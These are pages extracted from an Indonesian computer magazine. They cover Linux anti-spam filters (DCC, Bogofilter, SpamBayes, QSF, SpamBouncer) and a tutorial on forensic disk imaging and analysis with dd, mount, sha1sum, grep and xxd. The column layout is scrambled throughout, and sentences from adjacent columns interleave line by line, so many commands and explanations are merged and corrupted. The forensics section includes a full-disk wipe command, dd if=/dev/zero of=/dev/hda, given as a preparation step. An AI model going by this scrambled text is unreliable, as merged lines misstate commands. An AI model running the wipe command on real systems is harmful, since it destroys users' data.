2. dccifd; Client sesungguhnya adalah sebuah daemon. bertugas untuk memfilter bogus email.
Ini dianjurkan pada local proxy yang dapat digunakan
sebagai sebuah DCC interface untuk SpamAssassin Download Bogofilter
dan MTAs seperti Postfix. Bogoilter didownload di http://bogofilter.sourceforge.net
3. dccm; Ini Sendmail Mail Filter versi DCC. dan Bogofilter didistribusikan dalam dua bentuk yaitu
4. dccd; Ini DCC server daemon yang membuat bagian sebagai source code dan paket binary dalam paket RPM.
DCC network checksum database. Sebelumnya anda diharuskan untuk me-download selu-
5. cdcc; Ini sebuah kontrol program yang dimodifikasi ruh versi utama (bogofilter-current) atau seluruh versi
file kontrol untuk local DCC client dan juga menge- stable recent (bogofilter-stable), source tersebut didistri-
lola pengendalian DCC server. busikan dalam gzip tarball dengan nama file bogofilter-

Vol. IV No. 09 NeoTek 27


NeoStart

x.xx.xx.tar.gz dimana x berarti nomor versi. jut mengenai QSF dapat ditemukan di
Contoh: bogofilter-0.15.11.tar.gz http://www.ivarch.com/programs/qsf.shmtl

Instalasi Bogofilter Download QSF


Seperti DCC, instalasi Bogofilter juga tidak terlalu me- QSF didistribusikan sebagai sebuah gzip tarball yang di-
nyulitkan, caranya seperti berikut: sebut qsf-x.s.s.tar.gz dimana x berarti major dan minor
nomor versi. Contoh: qsf-0.9.9.tar.gz
tar -zxvf bogofilter-x.xx.xx.tar.gz
SPAMBOUNCER
Selanjutnya ikuti beberapa perintah berikut ini
SpamBouncer dijalankan dengan membutuhkan Procmail.
sh ./configure
SpamBouncer dibuat oleh Catherine A. Hampton dan
make dapat ditemukan di http://www.spambouncer.org
make install
Konfigurasi SpamBouncer
Menjalankan Bogofilter SpamBouncer didistribusikan dalam bentuk file ZIP. Pas-
tikan Procmail telah terinstalasi, selain itu SpamBouncer
Setelah Bogofilter diinstalasi, hal pertama yang diperlu- juga memerlukan nslookup atau program host untuk mem-
kan yaitu mensinkronkan antara spam dan ham. Pada bentuk pengecekan DNSBL.
umumnya Bayesian dapat mengambil 100 spam dan pesan
ham pada tiap filterisasi. Untuk dapat melakukan hal ter- Banyak opsi konfigurasi yang dapat digunakan untuk
sebut, berikut point-point yang perlu untuk dilakukan: SpamBouncer. Tiga variabel penting yang membutuhkan
setting dalam file .procmailrc, yaitu:
bogofilter -n < ham-mailbox
1. DEFAULT= /var/spool/mail/username
bogofilter -s < spam-mailbox
2. FORMAIL= /usr/bin/formail
Terakhir yaitu menambahkan script pada file .procmailrc, 3. SBDIR= $HOME/sb
scriptnya seperti yang terlihat di bawah
Selanjutnya membuat empat hidden text file yang nanti-
:0fw
nya akan digunakan oleh SpamBouncer (lihat boks di
| bogofilter -e -p bawah ini)
:0: SpamBouncer TextFile Hidden
* ^X-Bogosity: Yes, test=bogofilter
.legitlists File yang berisi daftar milis penting
$HOME/mail/spam
.localhostfile File yang berisi seluruh domain untuk setiap
email yang diterima
SPAMBAYES
.myemail File yang berisi seluruh alamat email anda
Pada bahasan Anti-Spam Toolkits for Windows, disebut- yang didapat dari sistem mail anda
kan SpamBayes bekerja sebagai Outlook plug-in, sesung-
guhnya tidak hanya sebagai Outlook plug-in bahkan le- .nobounce File yang berisi seluruh alamat email yang
bih dari itu yang membuat SpamBayes sebagai Proyek: didapat dari email yang anda terima

1. The Outlook Plug-in


2. Pop3proxy; Sebuah filter yang menganalisis mail POP
client yang didownload dari server. Selanjutnya variabel yang penting untuk di-set dalam
menggunakan SpamBouncer seperti yang diperlihatkan
3. Imapfilter; Bekerja seperti Pop3proxy tetapi juga digu- pada textboxt di bawah ini.
nakan bersama protokol IMAP mail-reading.
4. Hammiefilter; Sebuah filter yang dapat digunakan ber- SpamBouncer Other Variable Setting
sama Procmail. BLOCKFOLDER Sebuah mail folder dimana akan
Seluruh program SpamBayes membutuhkan Phyton te- ditempatkan email-email yang akan
lah terinstalasi. Versi Phyton yang dibutuhkan oleh diblock
SpamBayes adalah Phyton 2.2 atau yang terbaru. SPAMFOLDER Sebuah mail folder dimana akan
ditempatkanSpam
Download SpamBayes
BLOCKREPLY and Ini variabel untuk level auto-reply untuk
Download SpamBayes di http://spambayes.sourceforge.net.
SPAMREPLY Spam dan email yang diblock
SpamBayes didistribusikan sebagai gzip tarball tunggal
yang disebut spambayes-x.y.tar.gz untuk x berarti major PATTERNMATCHING Ini bentuk lain dari setting auto-reply
nomor versi dan y adalah minor nomor versi. Contoh: VIRUSFOLDER Folder ini ini berfungsi untuk
spambayes-1.0a7.tar.gz menempatkan email-email yang terdeteksi
memiliki virus
QSF (QUICK SPAM FILTER)
QSF merupakan bentuk lain yang termasuk dalam klasi-
fikasi Bayesian. Dirancang menjadi lebih simpel untuk
setup dan penggunaannya. QSF ditulis dalam bahasa C
dan oleh sebab itu harus dikompile di system. Lebih lan-

28 NeoTek Vol. IV No. 09


NeoTutor

COMPUTER FORENSICS
Forensic Tools pada Linux
Kali ini Firrar Utdirartatmo (firrar@lycos.com) membahas berbagai tool
yang terdapat pada Linux dari sudut pandang computer forensics.
Dalam prakteknya para cyber cops memang harus fasih menggunakan berbagai distro Linux.

S
AYA TERTARIK MEMBUAT ARTIKEL INI SETELAH MELIHAT kedalam disk tersebut. Ini bertujuan untuk menjamin agar
Neotek Vol IV No 6 mengenai computer forensics, data apapun yang ada pada disk tersebut benar-benar ber-
yang membahas tool-tool di Windows semacam asal dari image, dan bukan berasal dari data ‘sisa’ sebelum-
Norton Ghost. Sebenarnya artikel ini bukanlah panduan nya, yaitu data yang ditinggalkan dari proses apapun sebe-
profesional mengenai forensik, tetapi sekedar pengenalan lum restore image ke disk.
sederhana saja yang memanfaatkan tool-tool yang sudah Kita bisa mempergunakan suatu special device yang dipakai
ada pada kebanyakan distro Linux. Semoga pembaca dapat sebagai source of zeros. Ini dipakai untuk membuat suatu
memanfaatkan tool-tool tersebut yang selama ini mungkin file kosong dan wipe bagian-bagian dari disk. Kita bisa me-
jarang kita kenali kegunaannya, meski tidak dibatasi hanya nulis nol ke seluruh disk dengan mempergunakan perintah:
untuk keperluan forensik saja.
dd if=/dev/zero of=/dev/hda bs=4096
Linux sudah memiliki sejumlah utiliti sederhana yang mem-
buat proses imaging dan analisis dasar dari suatu disk dan Atau pada floppy disk dengan:
drive secara mudah. Di antaranya: dd if=/dev/zero of=/dev/fd0 bs=512
? dd atau cp: perintah yang dipergunakan untuk menyalin dd: writing `/dev/fd0': No space left on device
dari suatu file atau perangkat input ke perangkat output 2881+0 records in
atau file, di sini yang terjadi sebenarnya hanyalah imaging 2880+0 records out
bitstream sederhana Ini akan melakukan penulisan nol ke setiap sektor dalam
? cfdisk dan fdisk: untuk menentukan struktur disk 4096 atau 512 byte. Penentuan ukuran blok yang besar
bisa mempercepat proses penulisan. Suatu percobaan de-
? grep: mencari file-file untuk kemunculan suatu ekspresi ngan ukuran blok yang berbeda: misalnya 60 GB disk bisa
atau pola dilakukan dalam 1 jam dengan controller IDE. Sejumlah
? chmod: mengubah permission pada suatu file, untuk parameter drive tertentu bisa ditentukan dengan perintah
mematikan write permission pada suatu file image hdparm, misal setting dma pada suatu drive bisa mening-
? Loop device: memungkinkan melakukan mount suatu katkan kecepatan.
image tanpa perlu melakukan penulisan image ke disk 2. Membuat Image dari Suatu Disk
? sha1sum: membuat dan menyimpan suatu hash SHA Membuat image merupakan salah satu tahapan dalam kom-
dari suatu file atau daftar file (termasuk perangkatnya) puter forensik. Di sini kita akan coba membuat image untuk
? file: membaca informasi header file dalam suatu usaha suatu floppy disk:
untuk memastikan tipenya, tidak tergantung dari nama dd if=/dev/fd0 of=simpan.img bs=512
atau ekstensionnya 2880+0 records in
? xxd: tool hexdump command line untuk melihat file 2880+0 records out
dalam mode heksadesimal, atau bisa juga memanfaat- Perintah tersebut akan menyalin piranti floppy (/dev/fd0) se-
kan bila ada ghex dan khexedit, yaitu editor heksadesi- bagai input file (if) dan menulis output file(of) ke simpan.img.
mal Gnome dan KDE (GUI) yang mempunyai kemam- Lihat ukuran file yang dihasilkan tersebut 1474560. Option
puan pencarian dan pemilihan byte. bs menentukan ukuran blok, meski ini tidak selalu diperlu-
Berikut akan kita lihat sejumlah langkah sederhana yang kan untuk kebanyakan block device, karena ukuran blok
memungkinkan melakukan analisis praktis yang mudah sebenarnya ditangani oleh kernel Linux. Lalu bila anda ingin
memakai tool-tool Linux di atas. Selanjutnya bila merasa membuat image itu terjaga dari kemungkinan pengubahan,
belum jelas dengan tutorial ini bisa memakai perintah man ubahlah read-write permission dengan:
di Linux untuk melihat penggunaan tool-tool tersebut. chmod 444 simpan.img
Untuk sederhananya kita akan mempergunakan sebuah (444 akan memberikan semua user akses read-only)
floppy disk dengan format file DOS memuat sejumlah file,
di antaranya terdapat file yang hidden, file yang sudah Untuk melakukan restore image tersebut ke disk lainnya bagi
dihapus, juga subdirektori. Untuk hard disk kita hanya keperluan analisis, siapkan floppy disk kosong, dan
akan mengamati saja strukturnya. pergunakan:
dd if=simpan.img of=/dev/fd0 bs=512
Melakukan Imaging, Mounting, dan Split
Kalau anda lihat perintah ini semacam kebalikan dari
1. Menyiapkan Disk untuk Imaging perintah dd sebelumnya. Nah, floppy disk tersebut
Salah satu proses dalam forensik disk adalah melakukan sekarang siap dipergunakan sebagai working copy untuk
wipe suatu disk sebelum melakukan restore image forensik keperluan analisis.

Vol. IV No. 09 NeoTek 29


NeoTutor

3. Mounting Disk menandakan kalau kita ingin mempergunakan loop device


untuk melakukan mount image. Pindahlah ke direktori di
Setelah di-restore ke disk kita perlu melakukan mount disk
tersebut agar bisa melihat isinya. Ingat, di sini diasumsikan mana kita membuat image dan ketikkan:
disk berada dalam format Win 95/98. Sebelumnya kita buat mount -t vfat -o ro,noexec,loop simpan.img /mnt/analisis
dulu direktori /mnt/analisis. Lakukan mount dengan: Kalau kita berpindah ke direktori mnt/analisis kita bisa meng-
mount -t vfat -o ro,noexec /dev/fd0 /mnt/analisis amati image tersebut seperti mount disk biasa.
Dengan cara ini kita akan melakukan mount disk tersebut ke 5. Men-Split File
/mnt/analisis. Parameter -o ro,noexec menentukan option
read-only dan noexec untuk mencegah eksekusi dari binary Fungsi lainnya yang diinginkan adalah kemampuan untuk
hasil mount. Ini dilakukan dengan tujuan melindungi disk, memisahkan image ke dalam sejumlah potongan yang ber-
sekaligus juga melindungi sistem kita dari isi disk. guna, baik untuk archiving atau untuk penggunaan dalam
program lainnya. Misalkan kita mempunyai image 10 GB
Sekarang lakukan cd ke /mnt/analisis dan lihat isinya. yang ingin di-split ke dalam bagian-bagian 640 MB sehingga
bisa ditulis ke CD-ROM. Untuk itu gunakan perintah split.
4. Mounting Image Memakai Loopback Device
Terdapat suatu cara untuk melihat isi image tanpa perlu mem- split biasanya bekerja pada input file teks (berdasarkan baris).
Tetapi kita bisa mempergunakan option -b untuk memaksa
pergunakan disk lain, yaitu melakukan mount ke loop device.
Sebelumnya driver untuk loop device perlu dipasang dulu split untuk memperlakukan file sebagai input binary dan
mengabaikan baris. Kita bisa menentukan ukuran file yang
dengan memasukkannya ke module (Linux modular driver),
ke dalam kernel yang sedang berjalan. diinginkan dengan prefix yang ditentukan sebagai keluaran
file. Perintah semacam:
Modul-modul yang tersedia di sistem terletak pada
/lib/modules/$KERNEL-VERSION/. Modul tersebut berupa split -b XXm file_yang_akan_displit prefix_dari_keluaran_file
object file yang memuat kode driver yang diperlukan untuk untuk XX adalah ukuran dari file yang dihasilkan. Misalkan,
mendukung device atau option tertentu (dukungan sistem jika kita memiliki suatu image 6 GB yang disebut disk1.dd,
file pada Linux sering di-load sebagai modul). kita bisa memisahkannya ke dalam potongan file 2 GB
Catatan: Kita bisa memperoleh versi kernel dengan perintah: dengan perintah:
uname -r, contoh: split -b 2000m disk1.dd pisah
uname -r Akan menghasilkan tiga file (masing-masing berukuran 2 GB)
2.2.16-22 dengan nama diawali pisah seperti yang ada pada perintah,
diikuti dengan aa, ab, ac, dst seperti: pisahaa, pisahab, pisahac.
Terdapat tiga perintah yang berkaitan dengan pemasangan
modul secara on the fly: Proses ini bisa dibalikkan, misal kita akan merakit image dari
potongan file (misal dari CD) kita bisa mempergunakan per-
? insmod: insert modul intah cat dan melakukan redirect output ke suatu file baru.
? rmmod: remove modul Ingatlah, cat sebenarnya hanyalah melakukan stream file
yang ditentukan ke standar output. Jika kita melakukan
? lsmod: melihat daftar modul redirect output ini, file akan dirakit menjadi satu:
Kita melakukan pemasangan modul loop (loop.o) dengan cat pisahaa pisahab pisahac > baru.nih
(sesuaikan dengan versi kernel anda):
Atau
insmod /lib/modules/2.2.16-22/block/loop.o
cat pisaha* > baru.nih
Bila anda memakai kernel 2.4 maka struktur direktorinya
mungkin agak berbeda (sesuaikan versi kernel dulu): Hasil sha1sum dari baru.nih akan match dengan disk1.dd.
insmod /lib/modules/2.4.x/kernel/drivers/block/loop.o Kita bisa melakukan percobaan dengan split file floppy disk
menjadi 360k. Contoh:
Prinsipnya anda cari dulu dimana file loop.o tersebut berada.
Nah, untuk melihat apakah modul tersebut sudah terpasang split -b 360k simpan.img pisah
dengan benar, jalankan: Maka hasil perintah ls-l bila diambil ukuran filenya:
lsmod 368640 pisahaa
Outputnya akan semacam: 368640 pisahab
368640 pisahac
.. 368640 pisahad
Module Size Used by
loop 11488 0 (unused) Kita ketahui ukuran file simpan.img adalah 1474560 (image
.. dari floppy disk 1.44 MB). Anda bisa bereksperimen dengan
menggabungkan keempat potongan file, lalu membanding-
Catatan: pada sejumlah Linux terdapat kernel daemon yang kan sha1sum dengan floppy disk sebenarnya.
menangani secara otomatis loading dan unloading modul.
Jika kita menggunakan suatu perintah yang memerlukan Menangani Hard disk
suatu modul yang belum di-load sebelumnya, maka kernel
akan mendeteksi permintaan tersebut dan me-load modul 1. Menentukan Struktur Disk
bersangkutan. Fitur autoloader ini memudahkan kita ketim- Terdapat dua tool sederhana untuk menentukan struktur
bang melakukan secara manual dengan insmod. dari suatu disk yaitu fdisk dan cfdisk.
Sekarang kita siap melakukan mount image dengan loopback Perintah fdisk -l /dev/hda memberikan daftar semua partisi
device. Kita mempergunakan perintah mount dan option yang tersedia pada suatu drive tertentu. Setiap partisi akan
yang sama, tetapi sekarang menyertakan option loop untuk

30 NeoTek Vol. IV No. 09


NeoTutor

dikenali dengan nama Linux-nya. Boot flag menandakan h


m
Print this screen
Maximize disk usage of the current partition
awal serta akhir silinder dari tiap partisi. Jumlah blok untuk Note: This may make the partition incompatible with
tiap partisi juga ditampilkan. DOS, OS/2, ...
n Create new partition from free space
Jangan dikelirukan dengan FDISK.EXE pada DOS, karena p Print partition table to the screen or to a file
keduanya adalah tool yang berbeda. fdisk dari Linux me- There are several different formats for the partition
that you can choose from:
nyediakan fleksibilitas yang lebih besar dalam mengontrol r - Raw data (exactly what would be written to disk)
partisi. s - Table ordered by sectors
t - Table in raw format
Contoh penggunaan: q
t
Quit program without writing partition table
Change the filesystem type
fdisk -l /dev/hda u Change units of the partition size display
Rotates through MB, sectors and cylinders
Disk /dev/hda: 255 heads, 63 sectors, 524 cylinders W Write partition table to disk (must enter upper case W)
Since this might destroy data on the disk, you must
Units = cylinders of 16065 * 512 bytes either confirm or deny the write by entering `yes' or
`no'
Up Arrow Move cursor to the previous partition
Device Boot Start End Blocks Id System Down Arrow Move cursor to the next partition
/dev/hda1 * 1 128 1028128+ 6 FAT16 CTRL-L Redraws the screen
/dev/hda2 129 518 3132675 5 Extended ? Print this screen
/dev/hda5 129 319 1534176 6 FAT16 Note: All of the commands can be entered with either upper or lower
/dev/hda6 320 510 1534176 83 Linux case letters (except for Writes).
/dev/hda7 511 518 64228+ 82 Linux swap Meski cfdisk lebih mudah dipergunakan, tetapi keluaran-
Kita bisa melakukan redirect keluaran perintah ini ke file nya tidak bisa ditujukan untuk redirect ke file teks.
sehingga kita nanti bisa mengamatinya lebih seksama: Perhatian: Pergunakan fdisk dan cfdisk pada hard disk, bukan
fdisk -l /dev/hda > hasilfdisk.txt pada floppy.
Tool lainnya yang memberikan interaksi lebih adalah cfdisk. 2. Menangani Disk Berukuran Besar
Fungsinya mirip dengan fdisk, tetapi lebih mudah melaku-
kan navigasi dan memiliki menu yang memudahkan mani- Pada sejumlah contoh pada bagian Melakukan Imaging,
pulasi partisi. Mounting, dan Split di atas, kita mempergunakan sistem
file pada suatu floppy disk.
Contoh penggunaan:
Apa yang terjadi jika kita berurusan dengan hard disk?
cfdisk /dev/hda Saat kita membuat suatu image dari disk drive dengan pe-
cfdisk 2.10m rintah dd, terdapat sejumlah komponen dari image. Terma-
suk di dalamnya boot sector, tabel partisi, dan sejumlah
Disk Drive: /dev/hda partisi.
Size: 4311982080 bytes Jika kita berusaha melakukan mount image yang besar de-
Heads: 255 Sectors per Track: 63 Cylinders: 524 ngan loop device, kita akan mengetahui bila perintah mount
tidak mampu menemukan sistem file pada disk karena
Name Flags Part Type FS Type [Label] Size (MB) tidak mengetahui bagaimana menghadapi tabel partisi.
------------------------------------------------------------------------------
hda1 Boot Primary FAT16 [ ] 1052.84 Hal yang mudah untuk menanganinya (meski tak efisien)
hda5 Logical FAT16 [ ] 1571.03 adalah membuat image terpisah untuk tiap partisi disk
hda6 Logical Linux ext2 [/] 1571.03 yang ingin dianalisa. Untuk suatu hard disk sederhana
hda7 Logical Linux swap 65.81 dengan partisi tunggal yang besar, kita bisa membuat dua
Pri/Log Free Space 49.36 image, yaitu image logical dari tiap partisi. Bila diasumsi-
kan disk terhubung sebagai master di IDE 2 (hdc), maka
[Bootable] [ Delete ] [ Help ] [Maximize] [ Print ] perintahnya:
[ Quit ] [ Type ] [ Units ] [ Write ] dd if=/dev/hdc of=image.disk bs=4096
Toggle bootable flag of the current partition
dd if=/dev/hdc1 of=image.part1 bs=4096
Pada contoh di atas kebetulan hard disk yang dipergunakan Perintah pertama akan mengambil image dari keseluruhan
memiliki partisi FAT16 untuk drive C dan D, serta sebuah disk untuk keperluan backup, termasuk boot sector dan
partisi Linux ext2 dan swap. tabel partisi. Perintah kedua akan mengambil partisi per-
tama. Hasil image dari perintah kedualah (image.part1)
Awas, perhatikan dulu baik-baik kegunaan setiap menu de- yang bisa di-mount melalui loop device. Perlu diingat, mes-
ngan melihat help-nya. Jangan sampai melakukan peng- ki kedua perintah tersebut akan memuat data file yang
ubahan partisi di luar kendali anda. Contoh tampilan dari sama tetapi sha1sum keduanya tidak match.
help-nya:
Bagaimana kalau kita tidak ingin membuat dua image yang
Help Screen for cfdisk
This is cfdisk, a curses based disk partitioning program, which sebenarnya ‘sama’? Cara yang paling efisien untuk mena-
allows you to create, delete and modify partitions on your hard ngani disk yang besar (mount dengan loop device) adalah
disk drive. memerintahkan mount untuk melakukan skip 63 sector
Copyright (C) 1994-1999 Kevin E. Martin & aeb pertama dari image.
Command Meaning Sector tersebut dipakai memuat informasi (semacam MBR)
------- ------- yang bukan bagian dari data normal. Kita mengetahui tiap
b
d
Toggle bootable flag of the current partition
Delete the current partition sector adalah 512 byte, dan terdapat 63 sector tersebut. Se-
g Change cylinders, heads, sectors-per-track parameters hingga akan memberikan pada kita suatu offset 32256 byte
WARNING: This option should only be used by people who
know what they are doing.
dari awal image kita ke partisi pertama yang ingin kita mount.

Vol. IV No. 09 NeoTek 31


NeoTutor

Perintahnya adalah: Redirection tersebut memungkinkan kita menyimpan sig-


mount -t vfat -o ro,noexec,loop,offset=32256 image.disk /mnt/analisis nature ke suatu file dan mempergunakannya untuk veri-
fikasi nantinya.
Perintah ini akan meloncati 63 sector pertama dari image
dan langsung ke ‘boot sector’ dari partisi pertama, sehingga Kita bisa mempergunakan Linux untuk melakukan veri-
memungkinkan perintah mount dapat bekerja dengan tepat. fikasi tersebut bagi anda. Untuk menguji kalau tidak ada
yang berubah pada floppy semula, kita bisa memperguna-
Jika kita menemui disk lebih besar dari 2 GB, kita perlu kan option -c, dengan sha1sum. Jika disk tidak mengalami
memperhatikan ukuran file image. Pada distro Linux de- perubahan, maka perintah tersebut akan menghasilkan
ngan kernel 2.2.x, kita akan menghadapi batasan ukuran ’OK’. Pastikan floppy disk ada di dalam drive, ketikkan:
file 2 GB (pada keluarga x86). Kernel Linux 2.4.x telah
mengatasi masalah tersebut. sha1sum -c SHA.disk
Bagaimana kalau saat membuat image dengan dd lalu me- Maka hash SHA dalam file akan dibandingkan dengan
nemui read error? Kita bisa memerintahkan dd untuk me- SHA sum yang diambil dari floppy. Jika ada sesuatu yang
lewatinya dengan option conv=noerror, yang akan mem- telah berubah, maka program, akan memberikan pesan
buat dd mengabaikan error yang ditemui, dan berusaha kegagalan. File yang tidak berubah akan ditandai dengan
melewatinya. Bila perlu sertakan pula option sync yang ‘OK’, contoh.
akan ‘memperbaiki’ keluaran dd bila error ditemukan, dan /dev/fd0: OK
menjamin output akan sinkron dengan disk semula.
2. Membuat Daftar Semua File
Perintahnya menjadi:
Untuk melihat isi file kita bisa mempergunakan file mana-
dd if=/dev/hdx of=image.disk1 conv=noerror,sync ger favorit kita di Xwindow atau memanfaatkan ls. Memang
Jangan lupa dengan ketersediaan memori anda. Memakai seringkali perintah command line lebih berguna dan power-
grep pada image berukuran besar bisa jadi tidak akan be- ful, misal untuk melakukan redirection.
kerja baik, dan menghasilkan error semacam: ls -al
grep: memory exhausted Perintah tersebut akan menunjukkan semua file termasuk
Masalah yang muncul pada grep disebabkan ia mencari hidden (-a), memberikan daftar dalam format panjang (-l)
berdasarkan baris. Bila melakukan grep pada image yang yang memuat permission dan tanggal. Kita juga bisa
besar kita akan menghadapi bit dalam jumlah besar yang memanfaatkan option -R untuk menampilkan daftar secara
harus dibaca sebelum grep mencapai baris baru. Bagaimana rekursif pada subdirektori:
jika grep harus membaca 200 MB data sebelum mencapai ls -alR | less
baris baru? Tentu saja ia akan ‘kelelahan’ (buffer input
penuh). Cara mengakalinya adalah membuat ‘ganti baris’. less bisa dimanfaatkan bila file berjumlah cukup banyak
sehingga lebih mudah diamati.
Kita bisa memakai perintah tr untuk keperluan ini:
Perintah ls memiliki banyak kombinasi option. Misal,
tr '[:cntrl:]' '\n' < image.disk1 | grep -abif option -i menyertakan inode, option -u bisa dipergunakan
daftar_pencarian.txt > hits.txt untuk menyertakan urutan access time (dengan option t).
Arti perintah tersebut: Translasikan semua karakter yang Contoh penggunaan:
termuat dalam himpunan karakter control ini ([:cntrl:]) ke ls -laiRtu > /root/daftar
ganti baris (\n). Bawa input tr dari image.disk1 dan laku-
kan pipe keluarannya ke grep, lalu kirim hasil ke hits.txt. Kita juga bisa memperoleh daftar file, satu file perbaris
Dengan cara ini akan mengubah stream sebelum dikirim dengan mempergunakan perintah find dan redirection
ke grep. output:
Sebenarnya ada banyak kemungkinan yang bisa dilakukan find . -type f -print > /root/daftar2
dari tool-tool yang tersedia pada Linux, karena mereka Dari kedua perintah di atas, mana yang lebih anda sukai
cukup powerful dan mampu ‘mengakali’ bermacam peker- terserah anda?
jaan. Tentu saja bila shell standar gagal menanganinya an-
da bisa berpaling ke Perl atau Python sebagai pilihan lain. Perintah grep bisa dipakai untuk menemukan string atau
ekstension yang kita inginkan, misal:
Melakukan Analisa Forensik grep -i jpg daftar
1. Hash File Akan mencari pola jpg dari daftar file
Salah satu langkah penting dalam melakukan analisis ada- 3. Membuat Daftar File Type
lah menguji integritas dari data sebelum analisis lengkap.
Kita bisa memperoleh suatu hash (CRC, MD5, atau SHA) Bagaimana kalau kita mencari untuk data jenis JPEG tetapi
pada tiap file dengan banyak cara berbeda. Di sini kita coba nama file-nya telah berubah atau ekstensionnya salah?
mempergunakan hash SHA. SHA adalah hash signature Kita bisa mempergunakan perintah file pada tipe file dan
generator yang menyediakan 160 bit fingerprint pada file melihat apa isinya:
atau disk. Artinya signature SHA yang persis sama akan file nama_file
menyatakan file yang identik. Contoh suatu signature Contoh:
SHA (lihat ada 40 karakter di situ):
file Naik_KA.exe
508f22c543b40751153a1ba7da3efab3e48e509d /dev/fd0 Naik_KA.exe: MS-DOS executable (EXE), OS/2 or MS Windows
Kita bisa memperoleh SHA dari suatu disk dengan:
Atau file * untuk melihat tipe semua file:
sha1sum /dev/fd0 > SHA.disk
file *
32 NeoTek Vol. IV No. 09
NeoTutor

1978.jpg: JPEG image data, JFIF standard dari disk, sebagaimana halnya slack space. Di sini kita coba
Aircraft.jpg: JPEG image data, JFIF standard mencari teks dari suatu file yang terhapus (unallocated space).
baru: directory
Bersyukur.doc: Microsoft Office Document Pertama, kita akan mempergunakan perintah grep untuk
biayahidup.txt: ASCII text mencari kemunculan suatu ekspresi atau pola pada image.
Garuda.gif: GIF image data, version 89a, 606 x 209, Kita akan mempergunakan sejumlah option yang bisa
hasilsurvei.txt: data membuat keluaran dari grep menjadi lebih berguna.
Kesejatian.doc: Microsoft Office Document Sintaks dari grep adalah:
Naik_KA.exe: MS-DOS executable (EXE), OS/2 or MS Windows grep -options pattern range_pencarian
prospekmobilinternet.rtf: Rich Text Format data, version 1, ANSI
vi.jpg: JPEG image data, JFIF standard Hal pertama yang akan kita lakukan adalah membuat
daftar keyword untuk pencarian. Bukalah suatu teks editor
Jika ada sejumlah besar file tanpa ekstension, atau dimana dan buatlah daftar term yang ingin kita cari. Misalkan kita
ekstensionnya telah berubah, perintah file akan menemu- akan mempergunakan kata ‘game’, ‘karyawan’, dan
kannya. Misal kita coba salin file vi.jpg menjadi vi.j, lalu ‘mahasiswa’. Buatlah file daftarkata.txt berisi:
diperiksa dengan file: game
file vi.j karyawan
vi.j: JPEG image data, JFIF standard mahasiswa
Misalkan kita mencari image kita bisa mempergunakan Pastikan pada daftar itu tidak memuat baris kosong di da-
grep untuk menentukannya, buat dulu daftar type-nya: lam maupun di akhir file. Sekarang kita jalankan perintah
file * > /root/daftartype grep pada image:
Lalu pergunakan grep: grep -aibf daftarkata.txt simpan.img > hits.txt
cat /root/daftartype | grep image grep menggunakan file daftarkata.txt sebagai pola untuk
pencarian. Ini ditentukan dengan option -f . grep akan
1978.jpg: JPEG image data, JFIF standard mencari pada simpan.img untuk keberadaan pola tersebut,
Aircraft.jpg: JPEG image data, JFIF standard dan keluarannya akan dilakukan redirect ke file bernama
Garuda.gif: GIF image data, version 89a, 606 x 209 hits.txt, sehingga kita bisa mengamati keluarannya.
vi.jpg: JPEG image data, JFIF standard Option -a memberitahukan grep untuk mencetak semua
baris dimana terjadi kemunculan, bukan hanya nama file di
Perintah ini akan melakukan stream isi dari file daftartype mana mereka berada.
memakai cat dan melakukan pipe keluarannya dengan grep,
untuk mencari kemunculan string ‘image’. Option -i membuat grep mengabaikan perbedaan case
(huruf besar/kecil).
Catatan: file beratribut hidden tetap dapat muncul di sini.
Option -b membuat grep menampilkan byte offset dari
4. Melihat Isi File tiap kemunculan, sehingga kita bisa menemukan baris
tersebut memanfaatkan editor heksadesimal semacam xxd
Untuk file teks dan file data, kita bisa mempergunakan cat, atau Ghex.
more atau less untuk melihat isinya. Ingat, jika keluaran
bukanlah teks standar, kita mungkin akan ‘mengacaukan’ Kita bisa memanfaatkan cat, less, more atau strings untuk
terminal (ketikkan reset untuk membereskannya). melihat isi file hits.txt. Pada setiap awal baris ditampilkan
angka yang menunjukkan byte offset untuk baris tersebut
Lebih baik melakukannya dari jendela terminal pada pada file image.
Xwindow sehingga kita bisa menutupnya dengan mudah,
lalu membuka jendela terminal lainnya yang baru. cat hits.txt
Mempergunakan perintah file akan memberikan gambaran Gambar 1.
file mana yang akan dilihat. Mungkin, alternatif yang bagus Contoh isi file
untuk melihat file adalah mempergunakan perintah strings. hits.txt
Perintah ini bisa dipergunakan untuk melakukan parse teks
biasa pada file. Ini cocok untuk dokumen terformat (MS
Word atau OpenOffice), file data (Excel), bahkan binary
(misal executable yang tak diketahui) yang mempunyai
string teks yang diinginkan di dalamnya. Lebih baik lagi
melakukan pipe keluarannya dengan less:
strings nama_file| less
Cobalah melakukannya pada file DOC, JPG, bahkan EXE,
hasilnya mungkin akan menarik untuk diamati. Sekarang bukalah editor heksadesimal dan masukkan byte
offset yang ada pada hits.txt, ekivalensi ASCII-nya akan
Catatan: selesai melakukan eksplorasi, pastikan melakukan nampak di sebelah kanan. Anda akan menemukan hasil
unmount floppy atau image. Anda harus keluar dulu dari yang menarik.
mountpoint atau akan ada pesan ‘busy error’, lakukan:
Sintaksnya:
umount /mnt/analisis
xxd -s offset simpan.img | less
4. Mencari Teks pada Unallocated & Slack Space Misal dari contoh pada gambar, kita masukkan:
Sekarang kita akan menganalisa image yang merupakan copy xxd -s 414608 simpan.img | less
byte demi byte dan termasuk di dalamnya unallocated area

Vol. IV No. 09 NeoTek 33


NeoTutor

Pada contoh ter-


sebut data bisa
terlihat meski
berada pada file
yang sudah ter-
hapus.

Gambar 2.
Contoh tampilan
xxd

T
ERDAPAT BANYAK JENIS INVESTIGASI YANG DILAKUKAN
Mengambil Image Secara Remote dengan RDA
pada computer forensic. Salah satu sumber poten-
Mungkin anda pernah berpikir, "Bagaimana caranya mengambil image sial untuk memberikan informasi yang akan mem-
dari hard disk tanpa membongkar PC?" Nah, ketimbang membuka PC bantu pembuktian adanya suatu kejadian adalah melaku-
dan memasang hard disk lain ke komputer yang ingin kita ambil
image-nya, kita bisa memanfaatkan RDA untuk mengirim image lewat kan pemeriksaan dari aktivitas ber-Internet, semacam situs
jaringan ke komputer lain. Remote Data Acquisition Utility (RDA) web mana yang dikunjungi.
merupakan tool kecil untuk mengambil image hard disk dan mentrans-
fernya lewat jaringan dilengkapi dengan checksum MD5 dan/atau Kebanyakan user familiar dengan pemakaian browser Micro-
CRC32. soft Internet Explorer yang populer di Windows. Kita akan
Sederhananya di sini ada dua program yaitu RDA client dan RDA coba melakukan analisis forensik sederhana yang berkaitan
server. Di mana client akan booting dari floppy, lalu mengirim data dengan aktivitas ber-Internet, yaitu ditujukan pada file-file
